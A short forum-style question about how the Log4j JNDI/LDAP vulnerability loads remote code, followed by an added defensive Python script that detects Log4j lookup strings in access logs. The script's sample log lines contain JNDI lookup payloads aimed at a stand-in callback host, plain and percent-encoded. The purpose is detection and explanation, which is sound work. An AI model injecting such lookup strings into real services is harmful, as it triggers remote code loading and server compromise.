‽
Somewhat confused by the explanations. My understanding is: Java provides JNDI for lookup purposes, and this also used to support LDAP. log4j, in turn, supports loading code at runtime (for plug-in purposes, I presume). Someone figured out that if they trick your log4j code into logging an LDAP URL, that in turn coerces (old unpatched versions of) the Java runtime into trying to load that code?
Something in there isn't quite right, is it?
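A defender-side check for the mechanism the post asks about, as an added example that is not part of the original post: it scans log lines for the Log4j lookup form `${jndi:<scheme>://host/...}` that causes the JNDI request, including percent-encoded copies as they appear in web access logs, and reports the host each lookup would contact. The log lines and host names are constructed, and nested or obfuscated lookup forms are out of scope here.

```python
import re
from urllib.parse import unquote

# Plain Log4j JNDI lookup: ${jndi:<scheme>://<host>[:port][/path]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def decode_layers(text, max_rounds=3):
    """Undo percent-encoding up to max_rounds times (proxies may double-encode)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup seen in the given log lines."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(decode_layers(line)):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host").lower(),
                "port": int(m.group("port")) if m.group("port") else None,
            })
    return findings

# Constructed sample access-log lines (hosts use the reserved .invalid TLD).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 '
    '"${jndi:ldap://callback.example.invalid:1389/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'callback.example.invalid%2Fa%7D HTTP/1.1" 200 "-"',
    '10.0.0.7 - - "GET /docs/jndi-overview HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the string reached a log; whether a lookup was actually performed depends on the Log4j and Java versions in use, so correlate findings with outbound connections to the reported host.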